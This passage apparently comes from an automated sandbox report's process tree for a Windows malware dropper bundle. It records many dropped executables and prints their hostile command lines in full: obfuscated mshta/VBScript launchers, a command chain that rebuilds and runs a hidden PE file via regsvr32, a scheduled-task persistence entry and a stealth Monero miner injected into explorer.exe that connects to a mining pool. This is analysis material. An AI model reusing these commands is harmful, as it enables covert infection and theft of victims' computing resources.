C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt8⤵
- Executes dropped EXE
PID:2576 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBscRipT: ClOSe( crEatEobJECt ("wSCRIPT.SHEll" ).rUn ( "CMd.eXE /R tYpE ""C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe"" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if ""/p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe"" ) do taskkill -Im ""%~NxU"" -f " , 0 , tRUE ))9⤵PID:2788
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tYpE "C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if "/p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt "== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe") do taskkill -Im "%~NxU" -f10⤵PID:812
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCrIpT: cLOse (CrEATEOBJECT ( "wScrIpT.ShelL"). RUn( "cMd /Q /R eCHO | SET /P = ""MZ"" > 1oZVDA.JaC & CoPy /y /b 1OZVDA.jAC+ GjuW~.A +HPIuT6.AM +bDJeH5.9 yLIh.BIn & Del GJuW~.A HPIUT6.AM BDJEH5.9 1oZVDA.jaC& stArt regsvr32.exe /S YLIH.bIN " , 0 ,TRuE) )9⤵PID:2352
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /R eCHO | SET /P = "MZ" > 1oZVDA.JaC &CoPy /y /b 1OZVDA.jAC+ GjuW~.A +HPIuT6.AM +bDJeH5.9 yLIh.BIn & Del GJuW~.A HPIUT6.AM BDJEH5.9 1oZVDA.jaC& stArt regsvr32.exe /S YLIH.bIN10⤵PID:2540
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>1oZVDA.JaC"11⤵PID:2756
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHO "11⤵PID:2720
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -Im "Mon175e6c8b40064b8c8.exe" -f8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2592
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon173a360b525.exe4⤵PID:1212
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17bbf11fdb575d.exe4⤵
- Loads dropped DLL
PID:1176 -
C:\Users\Admin\AppData\Local\Temp\7zS4051E9E5\Mon17bbf11fdb575d.exeMon17bbf11fdb575d.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1252 -
C:\Users\Admin\AppData\Local\Temp\is-P3KN9.tmp\Mon17bbf11fdb575d.tmp"C:\Users\Admin\AppData\Local\Temp\is-P3KN9.tmp\Mon17bbf11fdb575d.tmp" /SL5="$10170,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS4051E9E5\Mon17bbf11fdb575d.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:884 -
C:\Users\Admin\AppData\Local\Temp\7zS4051E9E5\Mon17bbf11fdb575d.exe"C:\Users\Admin\AppData\Local\Temp\7zS4051E9E5\Mon17bbf11fdb575d.exe" /SILENT7⤵
- Executes dropped EXE
PID:1964
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17bffc2992eb3d.exe /mixone4⤵
- Loads dropped DLL
PID:1760 -
C:\Users\Admin\AppData\Local\Temp\7zS4051E9E5\Mon17bffc2992eb3d.exeMon17bffc2992eb3d.exe /mixone5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1156 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Mon17bffc2992eb3d.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS4051E9E5\Mon17bffc2992eb3d.exe" & exit6⤵PID:2344
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Mon17bffc2992eb3d.exe" /f7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2396
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon179f74c0ff3cf1f.exe4⤵
- Loads dropped DLL
PID:1324 -
C:\Users\Admin\AppData\Local\Temp\7zS4051E9E5\Mon179f74c0ff3cf1f.exeMon179f74c0ff3cf1f.exe5⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
PID:1644 -
C:\Users\Admin\Pictures\Adobe Films\GaPxyOFD_78ZdVJvXlwACPtP.exe"C:\Users\Admin\Pictures\Adobe Films\GaPxyOFD_78ZdVJvXlwACPtP.exe"6⤵
- Executes dropped EXE
PID:560
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1644 -s 15206⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:1932
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17afe24e0084db3.exe4⤵
- Loads dropped DLL
PID:1564 -
C:\Users\Admin\AppData\Local\Temp\7zS4051E9E5\Mon17afe24e0084db3.exeMon17afe24e0084db3.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1948 -
C:\Users\Admin\AppData\Local\Temp\7zS4051E9E5\Mon17afe24e0084db3.exe"C:\Users\Admin\AppData\Local\Temp\7zS4051E9E5\Mon17afe24e0084db3.exe" -u6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1896
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon1727c156c4abcec.exe4⤵
- Loads dropped DLL
PID:536 -
C:\Users\Admin\AppData\Local\Temp\7zS4051E9E5\Mon1727c156c4abcec.exeMon1727c156c4abcec.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1828
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon1708beae021a5ff.exe4⤵PID:1656
-
C:\Users\Admin\AppData\Local\Temp\7zS4051E9E5\Mon1708beae021a5ff.exeMon1708beae021a5ff.exe5⤵
- Executes dropped EXE
PID:1612
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4051E9E5\Mon1708beae021a5ff.exe"C:\Users\Admin\AppData\Local\Temp\7zS4051E9E5\Mon1708beae021a5ff.exe"5⤵
- Executes dropped EXE
PID:1968
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17332e41e6b.exe4⤵
- Loads dropped DLL
PID:1940 -
C:\Users\Admin\AppData\Local\Temp\7zS4051E9E5\Mon17332e41e6b.exeMon17332e41e6b.exe5⤵
- Executes dropped EXE
PID:1304
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon174a6c5f1664f.exe4⤵PID:1600
-
C:\Users\Admin\AppData\Local\Temp\7zS4051E9E5\Mon174a6c5f1664f.exeMon174a6c5f1664f.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:1228 -
C:\Users\Admin\AppData\Local\Temp\7zS4051E9E5\Mon174a6c5f1664f.exeC:\Users\Admin\AppData\Local\Temp\7zS4051E9E5\Mon174a6c5f1664f.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2332
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon178d8e5d06822.exe4⤵PID:976
-
C:\Users\Admin\AppData\Local\Temp\7zS4051E9E5\Mon178d8e5d06822.exeMon178d8e5d06822.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1680 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1600 -
C:\Users\Admin\AppData\Local\Temp\chrome.exe"C:\Users\Admin\AppData\Local\Temp\chrome.exe"7⤵
- Executes dropped EXE
PID:2084
-
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"7⤵
- Executes dropped EXE
PID:2088 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2088 -s 9808⤵
- Program crash
PID:3024
-
-
-
C:\Users\Admin\AppData\Local\Temp\chrome2.exe"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"7⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:2436
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
PID:2268 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit8⤵PID:1540
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f9⤵
- Kills process with taskkill
PID:3064
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"7⤵
- Executes dropped EXE
PID:2900
-
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1992
-
-
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2324 -
C:\Users\Admin\AppData\Roaming\7413983.exe"C:\Users\Admin\AppData\Roaming\7413983.exe"8⤵
- Executes dropped EXE
PID:2220
-
-
C:\Users\Admin\AppData\Roaming\1742005.exe"C:\Users\Admin\AppData\Roaming\1742005.exe"8⤵
- Executes dropped EXE
PID:2516
-
-
C:\Users\Admin\AppData\Roaming\3894789.exe"C:\Users\Admin\AppData\Roaming\3894789.exe"8⤵PID:3040
-
-
C:\Users\Admin\AppData\Roaming\7810937.exe"C:\Users\Admin\AppData\Roaming\7810937.exe"8⤵PID:2132
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRipt: CLosE ( CreaTEoBJeCT ( "WScRIPT.sHell" ).RUn ( "cMD.Exe /R COPY /Y ""C:\Users\Admin\AppData\Roaming\7810937.exe"" ..\FZkDRs9RSZN.Exe && sTArt ..\FZkDrs9RSZN.exe /PdmLkTgclA1F1vCuy4x & if """" == """" for %c in ( ""C:\Users\Admin\AppData\Roaming\7810937.exe"" ) do taskkill -IM ""%~nxc"" -f " , 0, TrUE) )9⤵PID:1604
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R COPY /Y "C:\Users\Admin\AppData\Roaming\7810937.exe" ..\FZkDRs9RSZN.Exe && sTArt ..\FZkDrs9RSZN.exe /PdmLkTgclA1F1vCuy4x& if ""== "" for %c in ( "C:\Users\Admin\AppData\Roaming\7810937.exe") do taskkill -IM "%~nxc" -f10⤵PID:2536
-
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "7810937.exe" -f11⤵
- Kills process with taskkill
PID:3056
-
-
C:\Users\Admin\AppData\Local\Temp\FZkDRs9RSZN.Exe..\FZkDrs9RSZN.exe /PdmLkTgclA1F1vCuy4x11⤵PID:2556
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\4653302.exe"C:\Users\Admin\AppData\Roaming\4653302.exe"8⤵PID:888
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"9⤵PID:2920
-
-
-
C:\Users\Admin\AppData\Roaming\6819169.exe"C:\Users\Admin\AppData\Roaming\6819169.exe"8⤵PID:2496
-
-
-
C:\Users\Admin\AppData\Local\Temp\zhanglijuan-game.exe"C:\Users\Admin\AppData\Local\Temp\zhanglijuan-game.exe"7⤵
- Executes dropped EXE
PID:3044
-
-
C:\Users\Admin\AppData\Local\Temp\chrome3.exe"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1748 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1748 -s 17048⤵
- Program crash
PID:1432
-
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"7⤵
- Executes dropped EXE
PID:1568
-
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"7⤵
- Executes dropped EXE
PID:2924 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"8⤵PID:2444
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"9⤵PID:1496
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"10⤵
- Creates scheduled task(s)
PID:2252
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"9⤵PID:1652
-
C:\Users\Admin\AppData\Roaming\services64.exeC:\Users\Admin\AppData\Roaming\services64.exe10⤵PID:2872
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"11⤵PID:2936
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"12⤵PID:3004
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"13⤵PID:2072
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth12⤵PID:2020
-
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17a0d8ec302e.exe4⤵
- Loads dropped DLL
PID:1092 -
C:\Users\Admin\AppData\Local\Temp\7zS4051E9E5\Mon17a0d8ec302e.exeMon17a0d8ec302e.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1908
-
-
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )1⤵PID:2740
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"2⤵PID:1980
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-100749844154904730418582117012112474178-1234704356-398637328-1302006511-364606341"1⤵
- Loads dropped DLL
PID:976
-
C:\Windows\system32\taskeng.exetaskeng.exe {56A2E06B-B59B-46F0-B7B2-476271E85DD2} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:596
-
C:\Users\Admin\AppData\Roaming\avbbfsgC:\Users\Admin\AppData\Roaming\avbbfsg2⤵PID:752
-
-
C:\Users\Admin\AppData\Roaming\avbbfsgC:\Users\Admin\AppData\Roaming\avbbfsg2⤵PID:2392
-
-
C:\Users\Admin\AppData\Roaming\avbbfsgC:\Users\Admin\AppData\Roaming\avbbfsg2⤵PID:1196
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {89B7D626-9135-46B9-B646-6137F6110892} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:2444
-
C:\Users\Admin\AppData\Roaming\avbbfsgC:\Users\Admin\AppData\Roaming\avbbfsg2⤵PID:2312
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {E349194C-9167-4535-8093-0D19E792CE3E} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:2964
-
C:\Users\Admin\AppData\Roaming\avbbfsgC:\Users\Admin\AppData\Roaming\avbbfsg2⤵PID:1196
-
-
C:\Users\Admin\AppData\Roaming\avbbfsgC:\Users\Admin\AppData\Roaming\avbbfsg2⤵PID:2876
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {5A299817-80A9-490C-9241-04F64720B535} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:1196
-
C:\Users\Admin\AppData\Roaming\avbbfsgC:\Users\Admin\AppData\Roaming\avbbfsg2⤵PID:2820
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {1F025AE7-E94B-4CA2-A0F1-E00E48F3AA9A} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:2796
-
C:\Users\Admin\AppData\Roaming\avbbfsgC:\Users\Admin\AppData\Roaming\avbbfsg2⤵PID:2252
-
-
C:\Users\Admin\AppData\Roaming\avbbfsgC:\Users\Admin\AppData\Roaming\avbbfsg2⤵PID:1452
-
-
C:\Users\Admin\AppData\Roaming\avbbfsgC:\Users\Admin\AppData\Roaming\avbbfsg2⤵PID:1176
-
-
C:\Users\Admin\AppData\Roaming\avbbfsgC:\Users\Admin\AppData\Roaming\avbbfsg2⤵PID:2096
-
-
C:\Users\Admin\AppData\Roaming\avbbfsgC:\Users\Admin\AppData\Roaming\avbbfsg2⤵PID:968
-
-
C:\Users\Admin\AppData\Roaming\avbbfsgC:\Users\Admin\AppData\Roaming\avbbfsg2⤵PID:2428
-
-
C:\Users\Admin\AppData\Roaming\avbbfsgC:\Users\Admin\AppData\Roaming\avbbfsg2⤵PID:2440
-
-
C:\Users\Admin\AppData\Roaming\avbbfsgC:\Users\Admin\AppData\Roaming\avbbfsg2⤵PID:1624
-
-
C:\Users\Admin\AppData\Roaming\avbbfsgC:\Users\Admin\AppData\Roaming\avbbfsg2⤵PID:1600
-
-
C:\Users\Admin\AppData\Roaming\avbbfsgC:\Users\Admin\AppData\Roaming\avbbfsg2⤵PID:1596
-
-
C:\Users\Admin\AppData\Roaming\avbbfsgC:\Users\Admin\AppData\Roaming\avbbfsg2⤵PID:1252
-
-
C:\Users\Admin\AppData\Roaming\avbbfsgC:\Users\Admin\AppData\Roaming\avbbfsg2⤵PID:748
-
-
C:\Users\Admin\AppData\Roaming\avbbfsgC:\Users\Admin\AppData\Roaming\avbbfsg2⤵PID:2804
-
-
C:\Users\Admin\AppData\Roaming\avbbfsgC:\Users\Admin\AppData\Roaming\avbbfsg2⤵PID:2444
-
-
C:\Users\Admin\AppData\Roaming\avbbfsgC:\Users\Admin\AppData\Roaming\avbbfsg2⤵PID:1492
-
-
C:\Users\Admin\AppData\Roaming\avbbfsgC:\Users\Admin\AppData\Roaming\avbbfsg2⤵PID:2164
-
-
C:\Users\Admin\AppData\Roaming\avbbfsgC:\Users\Admin\AppData\Roaming\avbbfsg2⤵PID:1464
-
-
C:\Users\Admin\AppData\Roaming\avbbfsgC:\Users\Admin\AppData\Roaming\avbbfsg2⤵PID:1792
-
-
C:\Users\Admin\AppData\Roaming\avbbfsgC:\Users\Admin\AppData\Roaming\avbbfsg2⤵PID:2336
-